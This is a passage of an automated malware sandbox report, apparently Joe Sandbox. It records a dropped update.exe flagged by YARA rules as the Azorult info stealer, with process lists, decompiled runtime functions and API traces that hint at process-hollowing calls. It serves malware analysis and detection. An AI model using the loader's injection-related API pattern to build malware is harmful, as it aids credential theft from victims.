                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                                                      Imagebase:0x7ff68f300000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:08:08:50
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:146536 bytes
                                                                                                                                      MD5 hash:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:08:08:50
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline: C:\Users\user\AppData\Roaming\update.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:602376 bytes
                                                                                                                                      MD5 hash:CF1EDC23E7EB941A4231A322C08C22B4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Visual Basic
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: Azorult_1, Description: Azorult Payload, Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                      • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:08:08:58
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:22
                                                                                                                                      Start time:08:08:59
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:23
                                                                                                                                      Start time:08:09:06
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:24
                                                                                                                                      Start time:08:09:06
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:25
                                                                                                                                      Start time:08:09:07
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:26
                                                                                                                                      Start time:08:09:16
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:27
                                                                                                                                      Start time:08:09:16
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                      Target ID:29
                                                                                                                                      Start time:08:09:31
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:6.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:21%
                                                                                                                                        Total number of Nodes:167
                                                                                                                                        Total number of Limit Nodes:2

                                                                                                                                        Callgraph

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E00E10FF6(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				char* _v16;
                                                                                                                                        				char _v28;
                                                                                                                                        				signed char _v32;
                                                                                                                                        				void* _t10;
                                                                                                                                        				void* _t19;
                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                        				void* _t24;
                                                                                                                                        				void* _t25;
                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                        
                                                                                                                                        				_t25 = __edi;
                                                                                                                                        				_t19 = __ebx;
                                                                                                                                        				while(1) {
                                                                                                                                        					_t10 = E00E1594C(_t19, _t24, _t25, _a4); // executed
                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					if(E00E135E1(_t10, _a4) == 0) {
                                                                                                                                        						_push(1);
                                                                                                                                        						_v16 = "bad allocation";
                                                                                                                                        						_t22 =  &_v28;
                                                                                                                                        						E00E186D3(_t22,  &_v16);
                                                                                                                                        						_v28 = 0xe82d90;
                                                                                                                                        						E00E187DB( &_v28, 0xeabaf8);
                                                                                                                                        						asm("int3");
                                                                                                                                        						_t27 = _t22;
                                                                                                                                        						 *_t27 = 0xe82d90;
                                                                                                                                        						E00E18711(_t22);
                                                                                                                                        						if((_v32 & 0x00000001) != 0) {
                                                                                                                                        							L00E1106C(_t27);
                                                                                                                                        						}
                                                                                                                                        						return _t27;
                                                                                                                                        					} else {
                                                                                                                                        						continue;
                                                                                                                                        					}
                                                                                                                                        					L7:
                                                                                                                                        				}
                                                                                                                                        				return _t10;
                                                                                                                                        				goto L7;
                                                                                                                                        			}













                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00E1594C: __FF_MSGBANNER.LIBCMT ref: 00E15963
                                                                                                                                          • Part of subcall function 00E1594C: __NMSG_WRITE.LIBCMT ref: 00E1596A
                                                                                                                                          • Part of subcall function 00E1594C: RtlAllocateHeap.NTDLL(01AE0000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                                                                                                                        • std::exception::exception.LIBCMT ref: 00E1102C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00E11041
                                                                                                                                          • Part of subcall function 00E187DB: RaiseException.KERNEL32(?,?,?,00EABAF8,00000000,?,?,?,?,00E11046,?,00EABAF8,?,00000001), ref: 00E18830
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.343324723.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.343306683.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344948720.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.345000305.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_df0000_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                        • String ID: 9I
                                                                                                                                        • API String ID: 3902256705-3853901842
                                                                                                                                        • Opcode ID: 1b1dbdc16d5d7d4838cf41b198419fe69774e5c5b12d597d7484b50c812a1ca4
                                                                                                                                        • Instruction ID: b106f030bd7d464a0630931428ed808a418722cc92478c3f98180425d903fa1e
                                                                                                                                        • Opcode Fuzzy Hash: 1b1dbdc16d5d7d4838cf41b198419fe69774e5c5b12d597d7484b50c812a1ca4
                                                                                                                                        • Instruction Fuzzy Hash: D1F0283590034DA6CB20BA68ED029EF7BEC9F04350F10206AFA08B61C1DFB18AC0D2D0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 19 e132df-e132ee call e132ab ExitProcess
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00E132DF(int _a4) {
                                                                                                                                        				void* _t4;
                                                                                                                                        
                                                                                                                                        				E00E132AB(_t4, _a4);
                                                                                                                                        				ExitProcess(_a4);
                                                                                                                                        			}




                                                                                                                                        0x00e132e5
                                                                                                                                        0x00e132ee

                                                                                                                                        APIs
                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00E132E5
                                                                                                                                          • Part of subcall function 00E132AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00E132EA,00E11013,?,00E15979,000000FF,0000001E,00000000,?,?,?,00E11013), ref: 00E132BA
                                                                                                                                          • Part of subcall function 00E132AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00E132CC
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00E132EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.343324723.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.343306683.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344948720.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.345000305.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_df0000_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                        • Opcode ID: b90f23375012cbe4409e7129b37134210cb3db94aa2a72f1bbe6d3bf72e5cf34
                                                                                                                                        • Instruction ID: 45cc867f35c2daf5808069813363b02975aa01c3f6ad5a48ff713c3f3d059c57
                                                                                                                                        • Opcode Fuzzy Hash: b90f23375012cbe4409e7129b37134210cb3db94aa2a72f1bbe6d3bf72e5cf34
                                                                                                                                        • Instruction Fuzzy Hash: C9B09230000208BFCB013F22DC0A8883F69FF00B90B004020F80818031DB72AAD2DA80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00E1A395(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                        
                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                        				return UnhandledExceptionFilter(_a4);
                                                                                                                                        			}



                                                                                                                                        0x00e1a39a
                                                                                                                                        0x00e1a3aa

                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E18F97,?,?,?,00000000), ref: 00E1A39A
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00E1A3A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.343324723.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.343306683.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.344948720.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.345000305.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_df0000_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 59bac160f1e371da3d12649f5e2dd1790632cb0d2c4985d2764a807d853709bc
                                                                                                                                        • Instruction ID: 82aeead4cf962f1f5849cd3113887df740d16a004a86da575cd4550353c129a3
                                                                                                                                        • Opcode Fuzzy Hash: 59bac160f1e371da3d12649f5e2dd1790632cb0d2c4985d2764a807d853709bc
                                                                                                                                        • Instruction Fuzzy Hash: 61B09231054208BFCA00AB92EC09B883F68EB44AAAF404020F60D94060CB6254948A91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:26
                                                                                                                                        Total number of Limit Nodes:3

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9cd4197710fa1ea93c942b3be0682a8d5fe3506a41be16571c762be6a95e7e5e
                                                                                                                                        • Instruction ID: ee3dbc54870a6cc2146914f374aec31101d531ee9b21cf913ed2eaa836d24037
                                                                                                                                        • Opcode Fuzzy Hash: 9cd4197710fa1ea93c942b3be0682a8d5fe3506a41be16571c762be6a95e7e5e
                                                                                                                                        • Instruction Fuzzy Hash: 2DF08271604704AECB59FBB8CC5599FB7ACFB4561079015A5A404D37D0EA34AF14E518
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                                                        • Instruction ID: 747d02ae0fc28a6449b6f9744eea9aae73bf8dfde97398da0595222e9f74d204
                                                                                                                                        • Opcode Fuzzy Hash: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                                                        • Instruction Fuzzy Hash: 53A012106084404AC80CEB1D4C8640F72805940010FC40A14645C953C1FE05856582DB
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 59 561c760-561c7ae GetFileVersionInfoSizeW 63 561c7b4-561c7e5 GetFileVersionInfoW 59->63 64 561c84a-561c85f 59->64 68 561c7e7-561c7ff 63->68 69 561c82d-561c842 63->69 68->69 72 561c801-561c829 68->72 72->69
                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0561C7A5
                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0561C7DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005611000.00000020.00000001.01000000.00000010.sdmp, Offset: 05611000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5611000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileInfoVersion$Size
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2104008232-0
                                                                                                                                        • Opcode ID: 8bb10cb657b9642a77658423be54acdec8e5c0c33d82afe54bc4384500cbcc57
                                                                                                                                        • Instruction ID: a3c45e30de2cb57e977a33bbc216c9fffae63033268c1cf9f1bfadac516364e1
                                                                                                                                        • Opcode Fuzzy Hash: 8bb10cb657b9642a77658423be54acdec8e5c0c33d82afe54bc4384500cbcc57
                                                                                                                                        • Instruction Fuzzy Hash: F8316170A04248AFEB44DFA9C885DBFBBF8EB48600B5444B9E904D3740EB74EE00D768
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005611000.00000020.00000001.01000000.00000010.sdmp, Offset: 05611000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5611000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a5bb824cf38b2f2bc9838366f6b37d5470a9f9be4285406c6465cf2079f9e609
                                                                                                                                        • Instruction ID: 24948269efacd64d5450d4d735a6a666c2a545a3ecbc0fad9919ab6d2761c3b2
                                                                                                                                        • Opcode Fuzzy Hash: a5bb824cf38b2f2bc9838366f6b37d5470a9f9be4285406c6465cf2079f9e609
                                                                                                                                        • Instruction Fuzzy Hash: 6A02DE32900635CFDB92CF69C480149B7B6FF8A72432A82D5D854AF229D270BE52DFD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                                                        • Instruction ID: 3f9509acde7592336106f0ae7345cc8773615aafe9a10577fe1a70276073e5d1
                                                                                                                                        • Opcode Fuzzy Hash: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                                                        • Instruction Fuzzy Hash: 8ED012BA27910256F72EC06E68B0B63054BF750364F25DC29A403D5FE0D565CCD0C920
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 05609CE9
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 05609D47
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 05609DA4
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 05609DD7
                                                                                                                                          • Part of subcall function 05609C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,05609D55), ref: 05609CAB
                                                                                                                                          • Part of subcall function 05609C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,05609D55), ref: 05609CC8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2255706666-0
                                                                                                                                        • Opcode ID: 7fa7953b92cadf206429a257ad0e5f27531a229cef8e32f4db4d3c0d366a4094
                                                                                                                                        • Instruction ID: a20d18091c27f469aa41239c6f1a6a5fafead894e9dccc5de246e06f63081c22
                                                                                                                                        • Opcode Fuzzy Hash: 7fa7953b92cadf206429a257ad0e5f27531a229cef8e32f4db4d3c0d366a4094
                                                                                                                                        • Instruction Fuzzy Hash: AD315C70E0021A9BCB14EBA4C884ABFB7BAFF04310F006569E511E73D2EB749A05CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:0.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:84.7%
                                                                                                                                        Signature Coverage:34.7%
                                                                                                                                        Total number of Nodes:98
                                                                                                                                        Total number of Limit Nodes:0

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 89 7b1215-7b1230 NtProtectVirtualMemory
                                                                                                                                        APIs
                                                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,007B109F,00000040,007B0686,00000000,00000000,00000000,00000000,00000000), ref: 007B122E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                        • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                                                        • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                                                                                                        • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                                                        • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 90 7b1233-7b123c GetPEB 91 7b123f-7b124a 90->91 91->91 92 7b124c-7b1253 91->92 92->91 93 7b1255-7b126b 92->93 94 7b126e-7b1271 93->94 94->94 95 7b1273-7b127c 94->95 95->94 97 7b127e-7b127f 95->97 98 7b1281-7b1284 97->98 99 7b1285 97->99 98->99 99->94 100 7b1287-7b12a1 99->100
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                                                        • Instruction ID: 76aa9f028f5b3d1e3602afb15c4001f45ac5aed7027763c5f387c1b8c0f20105
                                                                                                                                        • Opcode Fuzzy Hash: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                                                        • Instruction Fuzzy Hash: E2012C71641210DFD720CF48D9C0E96B3E8FB19760F8584A9E944DB611C278EC40CA62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000800), ref: 007B0170
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000), ref: 007B0178
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID: NtResumeThread$UnmapViewOfFile$ntdll
                                                                                                                                        • API String ID: 2340568224-2859181515
                                                                                                                                        • Opcode ID: a4c7b0bcf98bf6b787b11c28e7bed2fde61d16ed8fad31db22191ff2cffd75fa
                                                                                                                                        • Instruction ID: 6abf2804729c01489519d019d866183f424b3d6b682b49ad7d2ad7a0c4c8c2d2
                                                                                                                                        • Opcode Fuzzy Hash: a4c7b0bcf98bf6b787b11c28e7bed2fde61d16ed8fad31db22191ff2cffd75fa
                                                                                                                                        • Instruction Fuzzy Hash: 8B115C359072889EDF255FB4451F7FE3B21BB16310F148000E90A69023DE3C6A0B5788
